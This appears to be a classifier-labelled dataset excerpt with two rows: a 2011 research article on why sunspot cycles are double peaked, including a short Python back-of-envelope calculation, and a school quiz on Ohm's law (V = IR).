content: string · pred_label: string · pred_score: float64
ISRN Astronomy and Astrophysics, Volume 2011 (2011), Article ID 437838, 11 pages, doi:10.5402/2011/437838. Research Article: Why the Sunspot Cycle Is Double Peaked. Space and Solar-Terrestrial Research Institute, Bulgarian Academy of Sciences, 1000 Sofia, Bulgaria. Received 31 January 2011; Accepted 28 February 2011. Academic Editors: M. Ding and S. Jefferies. Copyright © 2011 K. Georgieva. This is an open access article distributed under the Creative Commons Attribution License, which permits unrestricted use, distribution, and reproduction in any medium, provided the original work is properly cited.

Abstract. Many sunspot cycles are double peaked. In 1967, Gnevyshev suggested that actually all cycles have two peaks generated by different physical mechanisms, but sometimes the gap between them is too short for the maxima to be distinguished in indices of the total sunspot activity. Here, we show that indeed all cycles have two peaks, easily identified in sunspot activity in different latitudinal bands. We study the double peaks in the last 12 sunspot cycles and show that they are manifestations of two surges of toroidal field: one generated from the poloidal field advected along the surface all the way to the poles, down to the tachocline, and equatorward to sunspot latitudes, and another generated from the poloidal field diffused at mid-latitudes from the surface to the tachocline and transformed there into toroidal field. The existence of these two surges of toroidal field is due to the relative magnitudes of the speed of the large-scale solar meridional circulation and the diffusivity in the solar convection zone, which are estimated from geomagnetic data.

1. Introduction
The term "solar activity" usually refers to any type of variation in the appearance or energy output of the Sun. Elements of solar activity are sunspots, solar flares, coronal mass ejections, coronal holes, total and spectral solar irradiance, and so forth. Sunspots are the most prominent evidence of solar activity and the one with the longest data record; though not geoeffective themselves, they are related to geoeffective active regions. Very big sunspots can be seen with the naked eye, and old chronicles testify that they were indeed observed even in ancient times. There is evidence that the Greeks knew of them at least by the 4th century BC, and the earliest records of sunspots observed by Chinese astronomers are from 28 BC. However, systematic observations of sunspots began only early in the 17th century, after the telescope was invented. Like many other great discoveries, the sunspot cycle was discovered by chance. Heinrich Schwabe, a German pharmacist and amateur astronomer, was convinced that there must be a planet, tentatively called Vulcan, inside the orbit of Mercury. Because of its close proximity to the Sun, Vulcan would have been very difficult to observe, and Schwabe believed one possibility to detect the planet might be to see it as a dark spot when passing in front of the Sun. For 17 years, from 1826 to 1843, on every clear day, Schwabe would scan the Sun and record its spots, trying to detect Vulcan among them. He did not find the planet, but he noticed the regular variation in the number of sunspots with a period of approximately 11 years and published his findings in a short article entitled "Solar observations during 1843" [1].
Apart from the observation that the number and area of sunspots increase and decrease cyclically every ~11 years, several other features of the sunspot cycle have to be taken into account in any theory trying to explain solar activity. The most important one is the finding of Hale, published in 1908 [2], that sunspots are associated with strong magnetic fields, that sunspots tend to occur in pairs, that on one hemisphere the leading (with respect to the direction of the solar rotation) spots in all pairs have the same polarity and the trailing spots have the other polarity, while on the other hemisphere the polarities are oppositely oriented, and that in subsequent 11-year sunspot cycles the polarities in the two hemispheres reverse [3]. Also, as the new solar cycle begins, sunspots first appear at higher heliolatitudes, and as the cycle approaches minimum, their emergence zone moves equatorward, a rule known as Spörer's law but actually discovered by Spörer's contemporary Carrington [4]. Another empirical rule important for understanding the sunspot cycle is Joy's law, stating that the leading sunspot in a sunspot pair appears at lower heliolatitudes than the trailing sunspot, and that the inclination of the sunspot pair relative to the equator increases with increasing latitude [5]. According to the solar dynamo theory developed by Parker in 1955 [6], the sunspot cycle is produced by an oscillation between toroidal and poloidal components, similar to the oscillation between kinetic and potential energies in a simple harmonic oscillator. The differential rotation at the base of the solar convection zone stretches the north-south field lines of the poloidal magnetic field, predominant in sunspot minimum, in the east-west direction, thus creating the toroidal component of the field. The buoyant magnetic flux tubes emerge, piercing the solar surface in two spots with opposite polarities: sunspots. This theory explains why sunspots appear in pairs, why the leading sunspots have the polarity of their respective poles, and why the polarities in the two hemispheres are opposite. To complete the cycle, the toroidal field must next be transformed back into a poloidal field with the opposite magnetic polarity. Several classes of possible mechanisms have been proposed to explain this process [7]. The mechanism currently considered most promising is the so-called flux-transport dynamo, first outlined by Babcock in 1961 [8] and mathematically developed by Leighton in 1969 [9]. Due to the Coriolis force acting upon the emerging flux tubes, in accordance with Joy's law, the leading polarity sunspots are at lower heliolatitudes than the trailing polarity sunspots. Late in the solar cycle, when sunspot pairs appear at very low heliolatitudes, the leading polarity sunspots diffuse across the equator and cancel with the leading polarity sunspots of the opposite hemisphere. The trailing polarity sunspots and the remaining sunspot pairs are carried toward the poles, where the excess trailing polarity flux first cancels the flux of the old solar cycle and then accumulates to form the poloidal field of the new cycle, with polarity opposite to the one in the preceding cycle. Wang et al. [10] suggested that this flux-transport dynamo includes a large-scale meridional circulation in the solar convection zone which carries the remnants of sunspot pairs poleward at the surface.
This circulation has been directly observed and confirmed by helioseismology (see [11] and references therein, and [12–14]), by the magnetic butterfly diagram [15, 16], and by the latitudinal drift of sunspots [17]. For mass conservation, the surface poleward circulation must be balanced by a deep counterflow at the base of the convection zone, carrying the poloidal field back to low latitudes and transforming it on the way into toroidal field, which emerges as the sunspots of the next cycle. This deep counterflow has not yet been observed, but its speed has been estimated from the equatorward drift of the sunspot occurrence latitudes [18, 19]. Actually, this deep circulation, carrying the flux equatorward like a conveyor belt, explains the so-called Spörer's law: the equatorward motion of the sunspot occurrence zone. Gnevyshev [20] studied the evolution of the intensity of the solar coronal line at 5303 Å in different latitudinal bands during the 19th sunspot cycle and found that there were actually two maxima in that cycle: the first one, during which the coronal intensity increased and subsequently decreased simultaneously at all latitudes, appeared in 1957; the second maximum appeared in 1959-1960 and was observed only at low latitudes, but below 15° it was even higher than the first maximum. Antalova and Gnevyshev [21] checked whether this is a feature of the 19th cycle only or of all cycles. They superposed the sunspot curves of all sunspot cycles from 1874 to 1962 and obtained the same result: there are always two maxima in the sunspot cycle, the first of which applies to all latitudes and appears simultaneously at all latitudes, while the second occurs only at low latitudes. The relative amplitude of the two peaks and the time interval between them vary, so in some cycles they are seen as a single peak in latitudinal averages, while in other cycles the gap between them, known as the "Gnevyshev gap", is clearly seen (Figure 1). Here and below, we use monthly values of the sunspot area smoothed by 13-point running averages, with weight 0.5 for the first and last points and 1 for the other points [22]. Figure 1: Total global sunspot area with the Gnevyshev gap seen in some of the cycles. For example, Norton and Gallagher [23], studying the sunspot area and sunspot number summed over the whole northern and southern hemispheres and over the whole disc, found Gnevyshev gaps in only 8 out of 12 cycles. However, when looking at different latitudinal bands, the Gnevyshev gap is clearly seen even in the cycles in which it is absent from the hemispheric or global totals. Figure 2 presents cycle 15, which according to [23] is single-peaked in the northern hemisphere and in the global sunspot area but has two very distinct peaks appearing in different periods and in different latitudinal bands. Figure 2: (a) Total sunspot area in cycle 15; (b) sunspot area in separate latitudinal bins, averaged over the two solar hemispheres. According to Gnevyshev [24], the two maxima in sunspot activity result from different physical processes, and their existence means that the apparent gradual displacement of the sunspot occurrence zone toward the equator is due to the superposition and changing relative importance of the two consecutive maxima.
This conclusion, that the equatorward motion of the sunspot appearance zone is only apparent and is actually due to the superposition of the two different sunspot maxima, contradicts the explanation that it follows from the equatorward deep meridional circulation, which is a critical part of the solar flux-transport dynamo theory. The goal of the present study is to try to find an explanation of the double-peaked sunspot cycle in the framework of the flux-transport dynamo mechanism.

2. Diffusion and Advection
The relation between the speed of the meridional circulation and the magnitude of the sunspot cycle is an indication of the regime of operation of the solar dynamo, determined by the relative importance of advection (transport by the meridional circulation) and diffusion [25]. If advection is more important than diffusion in the upper part of the solar convection zone, which is involved in poleward transport, a faster poleward circulation means less time for the leading polarity sunspots to cancel with their counterparts from the opposite hemisphere. On the way to the poles, the leading and trailing polarity flux will cancel each other, and with less excess trailing polarity flux, less trailing polarity flux will reach the poles uncanceled to neutralize the polar field of the old cycle and to create the poloidal field of the new cycle. From this weaker poloidal field, a weaker toroidal field will be generated, and the number of sunspots, which are the manifestation of the toroidal field, will be lower. In this case, there will be anticorrelation between the speed of the poleward meridional circulation and the amplitude of the following sunspot maximum. If diffusion is more important than advection, the leading polarity flux will have enough time to cancel with the leading polarity flux of the opposite hemisphere, but a slower circulation will mean more time for diffusive decay of the flux during its transport to the pole; hence, a weaker poloidal field will result and, correspondingly, a weaker toroidal field in the next cycle. In this case, there will be a positive correlation between the speed of the poleward meridional circulation and the amplitude of the following sunspot maximum. If diffusion is more important than advection at the base of the solar convection zone, where the toroidal field is generated, a faster equatorward circulation there will mean less time for diffusive decay of the flux during its transport through the convection zone, therefore a stronger toroidal field and a higher sunspot maximum in the next cycle. If advection is more important, a higher speed will mean less time for generation of toroidal field, hence a weaker toroidal field and a lower sunspot maximum [26]. Unfortunately, both the speed of the solar meridional circulation and the diffusivity in the solar convection zone are largely unknown. Direct measurements of the surface meridional circulation are available for less than three sunspot cycles [11, 27, 28], and its long-term variations and their correlation with the amplitude of the sunspot cycle are not known. The deep equatorward circulation has not been measured at all; its magnitude has only been estimated from the equatorward movement of the sunspot appearance zone [18]. The diffusivity in the upper part of the solar convection zone is estimated from the observed turbulent velocities and the size of the convection cells, but its radial profile is completely unknown.
Different authors have assumed different speeds of the surface and deep meridional circulation and different values and radial distributions of the turbulent diffusivity and, based on the same flux-transport model, have obtained drastically different forecasts for the forthcoming solar cycle 24 [29]. We have proposed a method to evaluate the speed of the surface and deep meridional circulation from geomagnetic data [30]. Here, we briefly explain this method and apply it to estimate the regime of operation of the solar dynamo and the origin of the two peaks of sunspot activity in the solar cycle.

3. Derivation of the Solar Meridional Circulation and Diffusivity
Even though we have no direct long-term observations of various solar processes, we do have means to reconstruct them. The Earth itself is a sort of probe registering solar variability, and records of the Earth's magnetic field contain evidence of the effects of the Sun's activity. The Earth's intrinsic magnetic field is basically dipolar, resembling the field of a bar magnet. Its magnitude is of order ~0.3 G (30,000 nT) at the Earth's surface near the magnetic equator and twice that at the poles. At times of enhanced energy input resulting from the action of solar activity agents, the magnetic field is disturbed, and its magnitude varies by about a percent of the main field due to currents in the ionosphere and magnetosphere. Two types of solar activity agents are responsible for these geomagnetic disturbances, corresponding to the two faces of the Sun's magnetism, the toroidal and poloidal components of the solar magnetic field: coronal mass ejections, huge bubbles of plasma with embedded magnetic fields ejected from the solar corona, which, like the number of sunspots, are a manifestation of the solar toroidal field; and high speed solar wind streams, emanating from solar coronal holes, a manifestation of the solar poloidal field. Consequently, geomagnetic activity has two peaks in the 11-year solar cycle (Figure 3). Figure 3: Geomagnetic aa-index (blue) and sunspot number (red) since the beginning of the aa-index record. The first peak is due to solar coronal mass ejections, which have their maximum in number and intensity at sunspot maximum, and hence it coincides with the sunspot maximum. The second one is caused by high speed solar wind streams from solar coronal holes, which have their maximum on the sunspot declining phase [31, 32]. Like the peak in the number of sunspots, the first peak in geomagnetic activity can also be double or even multiple [33]. Figure 4 is an example of a cycle with a clearly visible double peak in sunspot activity reflected in geomagnetic activity (1989 and 1991) and a second peak in geomagnetic activity on the declining phase of the sunspot cycle (1994). Figure 4: Two geomagnetic activity maxima in the sunspot cycle, used for the calculation of the speed of the surface poleward circulation from the time between sunspot max and the following aa max (pink), and of the deep equatorward circulation from the time between aa max and the following sunspot max (cyan). What is the timing of the geomagnetic activity peak due to high speed solar wind from coronal holes? Coronal holes are observed at any time of the sunspot cycle, but their effect on the Earth varies. In sunspot minimum, there are big polar coronal holes which, however, do not affect the Earth, because the fast solar wind emanating from them does not reach the ecliptic (Figure 5(a)).
In sunspot maximum, there are small, short-lived coronal holes scattered at all latitudes, giving rise to short and relatively weak high speed streams (Figure 5(b)). As shown by Wang et al. [34], geomagnetic activity reaches a maximum on the sunspot declining phase, when polar coronal holes have already formed and low latitude holes begin attaching themselves to their equatorward extensions and growing in size, so that the Earth is embedded in wide and long-lasting fast solar wind streams (Figure 5(c)). Figure 5: (a) Sunspot min: large polar coronal holes; no coronal holes at low latitudes; (b) sunspot max: small, scattered, short-lived coronal holes at all latitudes; (c) decline phase, when the trailing polarity flux reaches the poles. Coronal holes data compiled by K. Harvey and F. Recely using NSO KPVT observations under a grant from the NSF. We therefore assume that the geomagnetic activity maximum on the declining phase of the sunspot cycle appears when the flux from sunspot latitudes has reached the poles. Hence, the time between sunspot maximum and the geomagnetic activity maximum on the sunspot declining phase is the time it takes the solar surface meridional circulation to carry the remnants of sunspot pairs from sunspot latitudes to the poles, so from this time we can calculate the average speed of the surface poleward circulation V_surf (Figure 6(a)). Figure 6: (a) The distance traversed by the surface poleward circulation between sunspot maximum and the following geomagnetic activity maximum; (b) the calculated speed of the surface poleward meridional circulation V_surf (blue line; note the reversed scale) and the amplitude of the following sunspot cycle (red line). A high and statistically significant anticorrelation is found between V_surf and the amplitude of the following sunspot cycle: r = 0.7 with P = .03 (Figure 6(b); note the reversed scale of V_surf). This means that advection is more important than diffusion in the upper part of the solar convection zone. In order to check the reliability of the method, we compare the results to the available observational data. In the interval between sunspot cycles 10 and 23, V_surf calculated by our method varies between 4 and 18 m/s, averaged over latitude and over time. In the last cycle, 23, for which direct observations are available, the calculated speed is 16 m/s and agrees remarkably well with results from helioseismology and magnetic butterfly diagrams, which show a latitude-dependent speed profile varying smoothly from 0 m/s at the equator to 20–25 m/s at midlatitudes and back to 0 m/s at the poles [11, 13]. From the time between the geomagnetic activity maximum on the sunspot declining phase and the following sunspot maximum (Figure 4), we can calculate the speed of the deep meridional circulation and/or the diffusivity in the bulk of the solar convection zone. What this time reflects depends on the diffusivity in the upper part of the convection zone. Three cases are possible according to the classification of Hotta and Yokoyama [35] and the estimations of Jiang et al. [36]: very low diffusivity (advection dominated regime), very high diffusivity (strongly diffusion dominated regime), and moderate diffusivity (moderately diffusion dominated regime).

3.1. Advection Dominated Regime
If the diffusivity in the upper part of the convection zone is very low, which, according to Jiang et al.
[36], means η ≲ 10^7 m²/s, the flux will make one full circle from sunspot latitudes to the poles, down to the tachocline, and back to sunspot latitudes (Figure 7(a)). In this case, the time between the geomagnetic activity maximum on the sunspot declining phase and the next sunspot maximum is the time for the flux to sink to the base of the convection zone at polar latitudes, to be carried by the deep equatorward circulation to the equator, and to emerge as the sunspots of the new cycle. Assuming the speed of the downward transport of the flux to be equal to the speed of the deep equatorward circulation [36], and the time for the field tubes to emerge from the base of the convection zone to the surface to be three months, according to Fisher et al. [37], we can calculate the speed of the deep meridional circulation V_deep (Figure 7(b)). Figure 7: (a) The distance traversed by the circulation between the geomagnetic activity maximum and the following sunspot maximum in the case of very low diffusivity; (b) the calculated speed of the deep equatorward meridional circulation V_deep (blue line) and the amplitude of the following sunspot cycle (red line). The calculated V_deep is between 2.5 and 5 m/s, averaged over latitude and cycle, in excellent agreement with the estimations from the movement of the sunspot appearance zone [18], which give speeds between 1.5 and 3 m/s at sunspot maximum, decreasing from high to low latitudes and from the beginning to the end of the cycle. This gives us further confidence in the reliability of the method. The correlation between V_deep and the amplitude of the following sunspot cycle is positive and highly statistically significant (r = 0.79 with P < .001). From the sign of this correlation, we can evaluate the relative importance of diffusion and advection in the bottom part of the solar convection zone. The positive correlation obvious in Figure 7(b) means that diffusion is more important than advection there, so a faster circulation means less time for diffusive decay of the flux during its transport through the convection zone, therefore a stronger toroidal field and a higher sunspot maximum in the next cycle.

3.2. Strongly Diffusion Dominated Regime
The other extreme, very high diffusivity and a strongly diffusion-dominated regime in the upper part of the convection zone, occurs when η ≈ (2–9) × 10^8 m²/s and η/u₀ > 2 × 10^7 m, where u₀ is the maximum surface circulation speed [35]. In this case, the time from the geomagnetic activity maximum on the sunspot declining phase to the next sunspot maximum will be the time it takes the flux to diffuse through the convection zone, T = L²/η, where L is the thickness of the convection zone (Figure 8(a)), and from it we can calculate the average diffusivity in the bulk of the convection zone and the ratio η/u₀ (Figure 8(b)). This is the upper limit of the diffusivity, because it is calculated under the assumption that all of the flux diffuses directly to the tachocline before it can reach the poles. Figure 8: (a) Diffusion through the convection zone in the case of very high diffusivity in the upper part of the convection zone; (b) the calculated diffusivity in the upper part of the solar convection zone η (blue line) and the ratio of the diffusivity to the maximum surface circulation speed η/u₀ (green line).
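As a rough numerical check of the two timing-based estimates just described, consider the following Python sketch. All input numbers are illustrative assumptions (the start latitude, the travel times, and the convection-zone thickness are round guesses, not the values actually used in the paper), but they reproduce the orders of magnitude quoted above.

    # Back-of-envelope sketch of the two timing-based estimates.
    # All inputs below are illustrative assumptions, not the paper's data.
    import math

    R_SUN = 6.96e8        # solar radius in metres
    L_CZ = 0.29 * R_SUN   # assumed convection-zone thickness, ~2e8 m
    YEAR = 3.156e7        # seconds per year

    def surface_speed(lat_start_deg, lat_end_deg, years):
        # Mean poleward speed from the arc length traversed on the surface.
        arc = R_SUN * math.radians(abs(lat_end_deg - lat_start_deg))
        return arc / (years * YEAR)  # m/s

    def diffusivity_upper_limit(years):
        # If all flux diffuses across the zone in time T, then eta = L^2 / T.
        return L_CZ ** 2 / (years * YEAR)  # m^2/s

    # E.g. ~3 yr from sunspot max (spots near 30 deg) to the pole:
    print(surface_speed(30, 90, 3.0))    # ~7.7 m/s, inside the 4-18 m/s range
    # E.g. ~5 yr from the aa maximum to the next sunspot maximum:
    print(diffusivity_upper_limit(5.0))  # ~2.6e8 m^2/s, of order 10^8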
The values presented in Figure 8(b) are supported by estimations of the diffusivity in the upper part of the convection zone based on the observed turbulent velocities and the size of convection cells [9, 38], and by considerations about the correlation between the two solar hemispheres and between the strength of the polar field and the amplitude of the following sunspot maximum [36].

4. The Sunspot Cycle in the Moderately Diffusion-Dominated Regime
As seen from Figure 8(b), even under the assumption of diffusion strong enough that all of the flux diffuses through the convection zone before reaching the poles, the calculated η (1–2 × 10^8 m²/s) and η/u₀ (5 × 10^6–2 × 10^7 m) are not high enough for the strongly diffusion-dominated regime and, on the other hand, not low enough for the fully advection-dominated regime. According to Jiang et al. [36], in the case of intermediate diffusivity, η ≈ 1–2 × 10^8 m²/s (moderately diffusion-dominated regime), a part of the flux short-circuits the meridional circulation, while another part makes a full circle to the poles, down to the base of the convection zone, and equatorward to sunspot latitudes (Figure 9). Figure 9: Moderately diffusion-dominated regime: a part of the flux diffuses through the convection zone, "short-circuiting" the meridional circulation; another part makes a full circle to the poles, down to the base of the convection zone, and equatorward to sunspot latitudes. If the solar dynamo operates in the moderately diffusion-dominated regime in the upper part of the convection zone, the sunspot cycle will be a superposition of two surges of toroidal field: one generated from the poloidal field diffused across the convection zone, and another from the poloidal field advected by the meridional circulation. To check this, we have plotted the sunspot area as a function of time and latitude (data from http://solarscience.msfc.nasa.gov/greenwch.shtml). The sunspot area is given in 50 latitude bins (25 in each hemisphere), distributed uniformly in sine(latitude), for each sunspot cycle from 12 to 23. Here, we have used the averages over the two hemispheres in the respective bins. Figures 10(a) and 10(b) demonstrate the two peaks in cycle 16. The first one is centered at Carrington rotation 965 and appears simultaneously in a wide latitudinal range between 26.1° and 18.7° heliolatitude; the second one appears later and moves from 16.3° in Carrington rotation 981, to 13.9° in rotation 1003, to 9.2° in rotation 1018, and to 4.6° in rotation 1024. We identify the first peak with the flux diffused across the convection zone, and the second one with the flux advected all the way to the poles, down to the tachocline, and back equatorward to sunspot latitudes. Figure 10(c) presents a surface plot of the sunspot area in cycle 16 (averaged over the two hemispheres) as a function of time and latitude. The cyan lines delineate the evolution of the two surges of sunspot activity, with the vertical lines indicating the diffusion-generated peak occurring simultaneously in a wide latitudinal interval and the tilted lines indicating the advection-dominated peak progressing equatorward. Figure 10: Evolution of the sunspot area in cycle 16: (a) the peak appears simultaneously at latitudes between 26.1° and 18.7°; (b) the peak at lower latitudes appears later and moves further equatorward with time; (c) surface plot of the sunspot area in cycle 16 (averaged over the two hemispheres) as a function of time and latitude.
The diffusion-generated peak appears earlier and at higher heliolatitudes in all cycles from 15 to 19. The order is reversed in cycles 12–14 and 20–23: first the advection-generated peak at higher latitudes, then the diffusion-generated peak at lower latitudes. An example (cycle 21) is shown in Figure 11. First, the advection-generated peak appears at Carrington rotation 1650 and moves from about 20° to about 10° by rotation 1690; the second peak, centered around Carrington rotation 1705, appears simultaneously at all latitudes below 15°. Figure 11: The same as Figure 10(c), for cycle 21. Figure 12 presents the surface plots of the sunspot area in all cycles from 12 to 23 (averaged over the two hemispheres) as a function of time and latitude. Note that the colour codes are different in the plots for the different cycles. Figure 12: The same as Figure 10(c), for cycles 12 to 23 ((a) to (l)). Note that the colour code is different for the different plots. It seems that the order changes either in the ascending and descending phases of the secular cycle or in consecutive secular cycles (Figure 13). At present, it is difficult to understand the reason for this, but it is evidently connected with the long-term variations in solar activity and can give additional information about the solar dynamo. Figure 13: Advection-dominated before diffusion-dominated peak (a-d) and diffusion-dominated before advection-dominated peak (d-a) in the secular solar cycle.

5. Summary and Conclusion
The solar dynamo can operate in different regimes, determined by the relative importance of diffusion and advection in the upper and bottom parts of the solar convection zone. Based on estimations of the speed of the surface poleward meridional circulation and of the diffusion in the upper part of the convection zone, we have demonstrated that the dynamo operates there in the moderately diffusion-dominated regime, in which a part of the flux short-circuits the meridional circulation and diffuses directly to the bottom of the convection zone at midlatitudes, while another part makes a full circle to the poles, down to the base of the convection zone, and equatorward to sunspot latitudes. These two parts of the flux, when transformed by the differential rotation at the base of the convection zone, give rise to two peaks of sunspot activity, which are close but do not exactly coincide. In this way, the double-peaked sunspot cycle and the Gnevyshev gap find their natural explanation in the flux-transport dynamo theory.

References
1. H. Schwabe, "Sonnenbeobachtungen im Jahre 1843," Astronomische Nachrichten, vol. 21, pp. 233–236, 1844. 2. G. E. Hale, "On the probable existence of a magnetic field in sun-spots," Astrophysical Journal, vol. 28, pp. 315–348, 1908. 3. G. E. Hale and S. B. Nicholson, "The law of sun-spot polarity," Monthly Notices of the Royal Astronomical Society, vol. 85, pp. 270–300, 1925. 4. R. C. Carrington, "On the distribution of the solar spots in latitudes since the beginning of the year 1854, with a map," Monthly Notices of the Royal Astronomical Society, vol. 19, pp. 1–3, 1858. 5. G. E. Hale, F. Ellerman, S. B. Nicholson, and A. H. Joy, "The magnetic polarity of sun-spots," Astrophysical Journal, vol. 49, pp. 153–186, 1919. 6. E. Parker, "Hydromagnetic dynamo models," Astrophysical Journal, vol. 122, pp. 293–314, 1955. 7. P. Charbonneau, "Dynamo models of the solar cycle," Living Reviews in Solar Physics, vol. 7, no. 3, 2010. 8. H. W.
Babcock, "The topology of the Sun's magnetic field and the 22-year cycle," Astrophysical Journal, vol. 133, pp. 572–587, 1961. 9. R. Leighton, "A magneto-kinematic model of the solar cycle," Astrophysical Journal, vol. 156, pp. 1–26, 1969. 10. Y. M. Wang, N. R. Sheeley, and A. G. Nash, "A new solar cycle model including meridional circulation," Astrophysical Journal, vol. 383, no. 1, pp. 431–442, 1991. 11. D. H. Hathaway, "Doppler measurements of the Sun's meridional flow," Astrophysical Journal, vol. 460, no. 2, pp. 1027–1033, 1996. 12. V. I. Makarov, A. G. Tlatov, and K. R. Sivaraman, "Does the poleward migration rate of the magnetic fields depend on the strength of the solar cycle?" Solar Physics, vol. 202, no. 1, pp. 11–26, 2001. 13. J. Zhao and A. G. Kosovichev, "Torsional oscillation, meridional flows, and vorticity inferred in the upper convection zone of the Sun by time-distance helioseismology," Astrophysical Journal, vol. 603, no. 2, pp. 776–784, 2004. 14. I. G. Hernández, R. Komm, F. Hill, R. Howe, T. Corbard, and D. A. Haber, "Meridional circulation variability from large-aperture ring-diagram analysis of Global Oscillation Network Group and Michelson Doppler Imager data," Astrophysical Journal, vol. 638, no. 1, pp. 576–583, 2006. 15. E. V. Ivanov, V. N. Obridko, and B. D. Shelting, "Meridional drifts of large-scale solar magnetic fields and meridional circulation," in Proceedings of the 10th European Solar Physics Meeting, Solar Variability: From Core to Outer Frontiers, pp. 851–854, Prague, Czech Republic, September 2002. 16. M. Švanda, A. G. Kosovichev, and J. Zhao, "Speed of meridional flows and magnetic flux transport on the Sun," Astrophysical Journal, vol. 670, no. 1, pp. L69–L72, 2007. 17. J. Javaraiah and R. K. Ulrich, "Solar-cycle-related variations in the solar differential rotation and meridional flow: a comparison," Solar Physics, vol. 237, no. 2, pp. 245–265, 2006. 18. D. H. Hathaway, D. Nandy, R. M. Wilson, and E. J. Reichmann, "Evidence that a deep meridional flow sets the sunspot cycle period," Astrophysical Journal, vol. 589, no. 1, pp. 665–670, 2003. 19. D. H. Hathaway, D. Nandy, R. M. Wilson, and E. J. Reichmann, "Evidence that a deep meridional flow sets the sunspot cycle period," Astrophysical Journal, vol. 602, no. 1, p. 543, 2004. 20. M. N. Gnevyshev, "The corona and the 11-year cycle of solar activity," Soviet Astronomy-AJ, vol. 7, no. 3, pp. 311–318, 1963. 21. A. Antalova and M. N. Gnevyshev, "Principal characteristics of the 11-year solar activity cycle," Astronomicheskii Zhurnal, vol. 42, pp. 253–258, 1965. 22. W. Gleissberg, "A table of secular variations of the solar cycle," Terrestrial Magnetism and Atmospheric Electricity, vol. 49, pp. 243–244, 1944. 23. A. A. Norton and J. C. Gallagher, "Solar-cycle characteristics examined in separate hemispheres: phase, Gnevyshev gap, and length of minimum," Solar Physics, vol. 261, no. 1, pp. 193–207, 2009. 24. M. N. Gnevyshev, "On the 11-years cycle of solar activity," Solar Physics, vol. 1, no. 1, pp. 107–120, 1967.
25. D. H. Hathaway and L. Rightmire, "Variations in the Sun's meridional flow over a solar cycle," Science, vol. 327, no. 5971, pp. 1350–1352, 2010. 26. A. R. Yeates, D. Nandy, and D. H. Mackay, "Exploring the physical basis of solar cycle predictions: flux transport dynamics and persistence of memory in advection- versus diffusion-dominated solar convection zones," Astrophysical Journal, vol. 673, no. 1, pp. 544–556, 2008. 27. R. K. Ulrich and J. E. Boyden, "The solar surface toroidal magnetic field," Astrophysical Journal, vol. 620, no. 2, pp. L123–L127, 2005. 28. M. Dikpati, P. A. Gilman, G. De Toma, and R. K. Ulrich, "Impact of changes in the Sun's conveyor-belt on recent solar cycles," Geophysical Research Letters, vol. 37, no. 14, Article ID L14107, 2010. 29. D. H. Hathaway, "Solar cycle forecasting," Space Science Reviews, vol. 144, no. 1–4, pp. 401–412, 2009. 30. K. Georgieva and B. Kirov, "Solar dynamo and geomagnetic activity," Journal of Atmospheric and Solar-Terrestrial Physics, vol. 73, no. 2-3, pp. 207–222, 2011. 31. W. D. Gonzalez, B. T. Tsurutani, and A. L. Clúa de Gonzalez, "Interplanetary origin of geomagnetic storms," Space Science Reviews, vol. 88, no. 3-4, pp. 529–562, 1999. 32. W. D. Gonzalez, B. T. Tsurutani, and A. L. Clúa de Gonzalez, "Geomagnetic storms contrasted during solar maximum and near solar minimum," Advances in Space Research, vol. 30, no. 10, pp. 2301–2304, 2002. 33. R. P. Kane, "Which one is the 'Gnevyshev' gap?" Solar Physics, vol. 229, no. 2, pp. 387–407, 2005. 34. Y. M. Wang, N. R. Sheeley, and J. Lean, "Meridional flow and the solar cycle variation of the Sun's open magnetic flux," Astrophysical Journal, vol. 580, no. 2, pp. 1188–1196, 2002. 35. H. Hotta and T. Yokoyama, "Importance of surface turbulent diffusivity in the solar flux-transport dynamo," Astrophysical Journal, vol. 709, no. 2, pp. 1009–1017, 2010. 36. J. Jiang, P. Chatterjee, and A. R. Choudhuri, "Solar activity forecast with a dynamo model," Monthly Notices of the Royal Astronomical Society, vol. 381, no. 4, pp. 1527–1542, 2007. 37. G. H. Fisher, Y. Fan, D. W. Longcope, M. G. Linton, and W. P. Abbett, "Magnetic flux tubes inside the Sun," Physics of Plasmas, vol. 7, no. 5, pp. 2173–2179, 2000. 38. A. Ruzmaikin and S. A. Molchanov, "A model of diffusion produced by a cellular surface flow," Solar Physics, vol. 173, no. 2, pp. 223–231, 1997.
__label__pos
0.818128
YOU ARE LEARNING: V = IR. We can calculate the current, resistance and voltage using the equation V = I x R. Which letter do we use to represent the voltage in a circuit? Which letter do you think we use to represent the resistance in the circuit? Which of the following letters do we use to represent the current in a circuit? A circuit has a current of 2 A, a voltage of 10 V and a resistance of 5 Ω. Which of these is the correct formula for calculating resistance? How can we rearrange the formula R = V/I to make V the subject? 1 The image shows how we can calculate the voltage, resistance and current in a circuit and how they are related to each other. You place your thumb over the one you want to find, and the rest of the triangle shows what should be multiplied by what, or what should be divided by what. Do you think the resistance in all types of resistors is constant, or can resistance vary? Whilst normal resistors have a constant resistance, there is a type of resistor where we can change the resistance. We call them variable resistors. We can change the resistance in them and calculate the change in current. Imagine that we plot a graph of voltage, V, against current, I. What would the slope of the line show? 1 This graph shows the voltage plotted against the current for a circuit. What does the gradient or slope of the line represent? 2 This graph shows the voltage and current for a circuit. The gradient of the line is the resistance. Remember that we find resistance by dividing voltage (on the y-axis) by current (on the x-axis), like this: R = V/I 3 Is the slope of the line constant or changing? 4 What can we say about the relationship between the voltage and the current? A) They are inversely proportional. B) They are directly proportional. Answer A or B.
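As a quick check of the triangle relationships, here is a minimal Python sketch (the function names are ours, for illustration only) evaluating the three rearrangements of V = IR with the circuit from the quiz:

    # Ohm's law: V = I * R, rearranged as R = V / I and I = V / R.
    def voltage(current_amps, resistance_ohms):
        return current_amps * resistance_ohms

    def resistance(voltage_volts, current_amps):
        return voltage_volts / current_amps

    def current(voltage_volts, resistance_ohms):
        return voltage_volts / resistance_ohms

    # The quiz circuit: I = 2 A and V = 10 V, so R should come out as 5 ohms.
    print(resistance(10, 2))  # 5.0
    print(voltage(2, 5))      # 10
    print(current(10, 5))     # 2.0

For an ordinary (constant) resistor, these rearrangements all describe the same straight V-I line whose constant gradient is R, which is why voltage and current are directly proportional.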
__label__pos
1
